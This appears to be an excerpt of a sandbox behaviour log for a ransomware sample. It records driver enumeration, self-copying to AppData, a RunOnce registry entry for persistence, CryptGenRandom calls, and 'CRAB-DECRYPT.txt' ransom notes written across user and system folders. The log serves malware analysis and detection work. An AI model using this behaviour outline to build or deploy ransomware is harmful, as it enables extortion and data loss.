| Driver | Get Name | load_address = 1832189952 |
|
1 | |
| Driver | Get Name | load_address = 1827799040 |
|
1 | |
| Driver | Get Name | load_address = 1830879232 |
|
1 | |
| Driver | Get Name | load_address = 1831010304 |
|
1 | |
| Driver | Get Name | load_address = 1831206912 |
|
1 | |
| Driver | Get Name | load_address = 1831337984 |
|
1 | |
| Driver | Get Name | load_address = 1818558464 |
|
1 | |
| Driver | Get Name | load_address = 1827864576 |
|
1 | |
| Driver | Get Name | load_address = 1818689536 |
|
1 | |
| Driver | Get Name | load_address = 1818886144 |
|
1 | |
| Driver | Get Name | load_address = 1816920064 |
|
1 | |
| Driver | Get Name | load_address = 1817247744 |
|
1 | |
| Driver | Get Name | load_address = 1344339968 |
|
1 | |
| Driver | Get Name | load_address = 1360658432 |
|
1 | |
| Driver | Get Name | load_address = 1346371584 |
|
1 | |
| Driver | Get Name | load_address = 1817378816 |
|
1 | |
| Driver | Get Name | load_address = 1851523072 |
|
1 | |
| Driver | Get Name | load_address = 1347878912 |
|
1 | |
| Driver | Get Name | load_address = 1347944448 |
|
1 | |
| Driver | Get Name | load_address = 1852178432 |
|
1 | |
| Driver | Get Name | load_address = 1852375040 |
|
1 | |
| Driver | Get Name | load_address = 1852506112 |
|
1 | |
| Driver | Get Name | load_address = 1852637184 |
|
1 | |
| Driver | Get Name | load_address = 1852768256 |
|
1 | |
| Driver | Get Name | load_address = 1835008000 |
|
1 | |
| Driver | Get Name | load_address = 1836187648 |
|
1 | |
| Driver | Get Name | load_address = 1836384256 |
|
1 | |
| Driver | Get Name | load_address = 1836908544 |
|
1 | |
| Driver | Get Name | load_address = 1837170688 |
|
1 | |
| Driver | Get Name | load_address = 1837301760 |
|
1 | |
| Driver | Get Name | load_address = 1837432832 |
|
1 | |
| Driver | Get Name | load_address = 1837760512 |
|
1 | |
| Driver | Get Name | load_address = 1838481408 |
|
1 | |
| Driver | Get Name | load_address = 1839071232 |
|
1 | |
| Driver | Get Name | load_address = 1839857664 |
|
1 | |
| Driver | Get Name | load_address = 1839988736 |
|
1 | |
| Driver | Get Name | load_address = 1840316416 |
|
1 | |
| Driver | Get Name | load_address = 1840513024 |
|
1 | |
| Driver | Enumerate | load_addresses = 1703688 |
|
1 | |
| Driver | Enumerate | load_addresses = 5832704 |
|
1 | |
| Driver | Get Name | load_address = 3483488256 |
|
1 | |
| Driver | Get Name | load_address = 3491663872 |
|
1 | |
| Driver | Get Name | load_address = 3467825152 |
|
1 | |
| Driver | Get Name | load_address = 1801781248 |
|
1 | |
| Driver | Get Name | load_address = 1802371072 |
|
1 | |
| Driver | Get Name | load_address = 1802436608 |
|
1 | |
| Driver | Get Name | load_address = 1802895360 |
|
1 | |
| Driver | Get Name | load_address = 1803091968 |
|
1 | |
| Driver | Get Name | load_address = 1803223040 |
|
1 | |
| Driver | Get Name | load_address = 1803288576 |
|
1 | |
| Driver | Get Name | load_address = 1803354112 |
|
1 | |
| Driver | Get Name | load_address = 1797259264 |
|
1 | |
| Driver | Get Name | load_address = 1797914624 |
|
1 | |
| Driver | Get Name | load_address = 1798307840 |
|
1 | |
| Driver | Get Name | load_address = 1798766592 |
|
1 | |
| Driver | Get Name | load_address = 1798963200 |
|
1 | |
| Driver | Get Name | load_address = 1799684096 |
|
1 | |
| Driver | Get Name | load_address = 1800536064 |
|
1 | |
| Driver | Get Name | load_address = 1800667136 |
|
1 | |
| Driver | Get Name | load_address = 1800863744 |
|
1 | |
| Driver | Get Name | load_address = 1800929280 |
|
1 | |
| Driver | Get Name | load_address = 1819148288 |
|
1 | |
| Driver | Get Name | load_address = 1819738112 |
|
1 | |
| Driver | Get Name | load_address = 1819803648 |
|
1 | |
| Driver | Get Name | load_address = 1819934720 |
|
1 | |
| Driver | Get Name | load_address = 1820000256 |
|
1 | |
| Driver | Get Name | load_address = 1820131328 |
|
1 | |
| Driver | Get Name | load_address = 1803550720 |
|
1 | |
| Driver | Get Name | load_address = 1803943936 |
|
1 | |
| Driver | Get Name | load_address = 1804075008 |
|
1 | |
| Driver | Get Name | load_address = 1804206080 |
|
1 | |
| Driver | Get Name | load_address = 1804337152 |
|
1 | |
| Driver | Get Name | load_address = 1804533760 |
|
1 | |
| Driver | Get Name | load_address = 1805123584 |
|
1 | |
| Driver | Get Name | load_address = 1805254656 |
|
1 | |
| Driver | Get Name | load_address = 1805647872 |
|
1 | |
| Driver | Get Name | load_address = 1805778944 |
|
1 | |
| Driver | Get Name | load_address = 1805975552 |
|
1 | |
| Driver | Get Name | load_address = 1806499840 |
|
1 | |
| Driver | Get Name | load_address = 1806630912 |
|
1 | |
| Driver | Get Name | load_address = 1806761984 |
|
1 | |
| Driver | Get Name | load_address = 1807024128 |
|
1 | |
| Driver | Get Name | load_address = 1809252352 |
|
1 | |
| Driver | Get Name | load_address = 1809317888 |
|
1 | |
| Driver | Get Name | load_address = 1810497536 |
|
1 | |
| Driver | Get Name | load_address = 1811021824 |
|
1 | |
| Driver | Get Name | load_address = 1811218432 |
|
1 | |
| Driver | Get Name | load_address = 1813708800 |
|
1 | |
| Driver | Get Name | load_address = 1814167552 |
|
1 | |
| Driver | Get Name | load_address = 1814364160 |
|
1 | |
| Driver | Get Name | load_address = 1815085056 |
|
1 | |
| Driver | Get Name | load_address = 1815543808 |
|
1 | |
| Driver | Get Name | load_address = 1815871488 |
|
1 | |
| Driver | Get Name | load_address = 1816133632 |
|
1 | |
| Driver | Get Name | load_address = 1816264704 |
|
1 | |
| Driver | Get Name | load_address = 1816788992 |
|
1 | |
| Driver | Get Name | load_address = 1817968640 |
|
1 | |
| Driver | Get Name | load_address = 1818099712 |
|
1 | |
| Driver | Get Name | load_address = 1818165248 |
|
1 | |
| Driver | Get Name | load_address = 1818230784 |
|
1 | |
| Driver | Get Name | load_address = 1818296320 |
|
1 | |
| Driver | Get Name | load_address = 1818427392 |
|
1 | |
| Driver | Get Name | load_address = 1832648704 |
|
1 | |
| Driver | Get Name | load_address = 1834680320 |
|
1 | |
| Driver | Get Name | load_address = 1834811392 |
|
1 | |
| Driver | Get Name | load_address = 1834942464 |
|
1 | |
| Driver | Get Name | load_address = 1824522240 |
|
1 | |
| Driver | Get Name | load_address = 1824718848 |
|
1 | |
| Driver | Get Name | load_address = 1824784384 |
|
1 | |
| Driver | Get Name | load_address = 1825112064 |
|
1 | |
| Driver | Get Name | load_address = 1825767424 |
|
1 | |
| Driver | Get Name | load_address = 1825898496 |
|
1 | |
| Driver | Get Name | load_address = 1826095104 |
|
1 | |
| Driver | Get Name | load_address = 1826226176 |
|
1 | |
| Driver | Get Name | load_address = 1826750464 |
|
1 | |
| Driver | Get Name | load_address = 1827340288 |
|
1 | |
| Driver | Get Name | load_address = 1827405824 |
|
1 | |
| Driver | Get Name | load_address = 1827471360 |
|
1 | |
| Driver | Get Name | load_address = 1827536896 |
|
1 | |
| Driver | Get Name | load_address = 1827602432 |
|
1 | |
| Driver | Get Name | load_address = 1827930112 |
|
1 | |
| Driver | Get Name | load_address = 1828192256 |
|
1 | |
| Driver | Get Name | load_address = 1828323328 |
|
1 | |
| Driver | Get Name | load_address = 1828388864 |
|
1 | |
| Driver | Get Name | load_address = 1828519936 |
|
1 | |
| Driver | Get Name | load_address = 1828651008 |
|
1 | |
| Driver | Get Name | load_address = 1829044224 |
|
1 | |
| Driver | Get Name | load_address = 1829240832 |
|
1 | |
| Driver | Get Name | load_address = 1829699584 |
|
1 | |
| Driver | Get Name | load_address = 1829830656 |
|
1 | |
| Driver | Get Name | load_address = 1830354944 |
|
1 | |
| Driver | Get Name | load_address = 1831403520 |
|
1 | |
| Driver | Get Name | load_address = 1831469056 |
|
1 | |
| Driver | Get Name | load_address = 1831534592 |
|
1 | |
| Driver | Get Name | load_address = 1831600128 |
|
1 | |
| Driver | Get Name | load_address = 1832124416 |
|
1 | |
| Driver | Get Name | load_address = 1832189952 |
|
1 | |
| Driver | Get Name | load_address = 1827799040 |
|
1 | |
| Driver | Get Name | load_address = 1830879232 |
|
1 | |
| Driver | Get Name | load_address = 1831010304 |
|
1 | |
| Driver | Get Name | load_address = 1831206912 |
|
1 | |
| Driver | Get Name | load_address = 1831337984 |
|
1 | |
| Driver | Get Name | load_address = 1818558464 |
|
1 | |
| Driver | Get Name | load_address = 1827864576 |
|
1 | |
| Driver | Get Name | load_address = 1818689536 |
|
1 | |
| Driver | Get Name | load_address = 1818886144 |
|
1 | |
| Driver | Get Name | load_address = 1816920064 |
|
1 | |
| Driver | Get Name | load_address = 1817247744 |
|
1 | |
| Driver | Get Name | load_address = 1344339968 |
|
1 | |
| Driver | Get Name | load_address = 1360658432 |
|
1 | |
| Driver | Get Name | load_address = 1346371584 |
|
1 | |
| Driver | Get Name | load_address = 1817378816 |
|
1 | |
| Driver | Get Name | load_address = 1851523072 |
|
1 | |
| Driver | Get Name | load_address = 1347878912 |
|
1 | |
| Driver | Get Name | load_address = 1347944448 |
|
1 | |
| Module | Get Filename | process_name = c:\users\nd9e1fyi\appdata\roamingqtp35.exe, file_name_orig = C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe, size = 256 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Environment | Get Environment String | name = AppData, result_out = C:\Users\Nd9E1FYi\AppData\Roaming |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce, value_name = duyccbpmaea, data = "C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe", size = 88, type = REG_SZ |
|
1 |
Thread 0xe30
4802
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| File | Create | filename = C:\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\$Recycle.Bin\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\$Recycle.Bin\S-1-5-18\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\$Recycle.Bin\S-1-5-21-2172869166-1497266965-2109836178-1000\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\MSOCache\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\PerfLogs\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Recovery\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\System Volume Information\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Default\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Default\AppData\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Default\AppData\Local\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Default\AppData\Local\Application Data\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Default\AppData\Local\History\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Default\AppData\Local\Microsoft\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Default\AppData\Local\Microsoft\InputPersonalization\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Default\AppData\Local\Microsoft\InputPersonalization\TrainedDataStore\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Default\AppData\Local\Microsoft\Windows Sidebar\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Default\AppData\Local\Microsoft\Windows Sidebar\Gadgets\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Get Info | filename = C:\Users\Default\AppData\Local\Microsoft\Windows Sidebar\settings.ini, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Users\Default\AppData\Local\Microsoft\Windows Sidebar\settings.ini, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Create | filename = C:\Users\Default\AppData\Local\Temp\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Default\AppData\Local\Temporary Internet Files\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Default\AppData\Roaming\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Default\AppData\Roaming\Microsoft\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Default\Application Data\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Default\Cookies\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Default\Desktop\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Default\Documents\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Default\Documents\My Music\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Default\Documents\My Pictures\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Default\Documents\My Videos\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Default\Downloads\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Default\Favorites\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Default\Links\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Default\Music\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Default\My Documents\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Default\NetHood\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Get Info | filename = C:\Users\Default\NTUSER.DAT.LOG1, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Users\Default\NTUSER.DAT.LOG1, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\Default\NTUSER.DAT.LOG2, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Users\Default\NTUSER.DAT.LOG2, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\Default\NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TM.blf, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Users\Default\NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TM.blf, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\Default\NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TMContainer00000000000000000001.regtrans-ms, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Users\Default\NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TMContainer00000000000000000001.regtrans-ms, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\Default\NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TMContainer00000000000000000002.regtrans-ms, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Users\Default\NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TMContainer00000000000000000002.regtrans-ms, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Create | filename = C:\Users\Default\Pictures\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Default\PrintHood\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Default\Recent\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Default\Saved Games\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Default\SendTo\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Default\Start Menu\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Default\Templates\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Default\Videos\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Default User\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Acrobat\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Acrobat\DC\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Acrobat\DC\Collab\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Acrobat\DC\Forms\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Acrobat\DC\JSCache\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Acrobat\DC\Security\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Flash Player\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Flash Player\AssetCache\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Flash Player\AssetCache\EYGUEQKQ\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Flash Player\NativeCache\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Headlights\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Linguistics\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\LogTransport2\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\LogTransport2\Logs\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Sonar\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Sonar\Sonar1.0\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Macromedia\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Macromedia\Flash Player\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
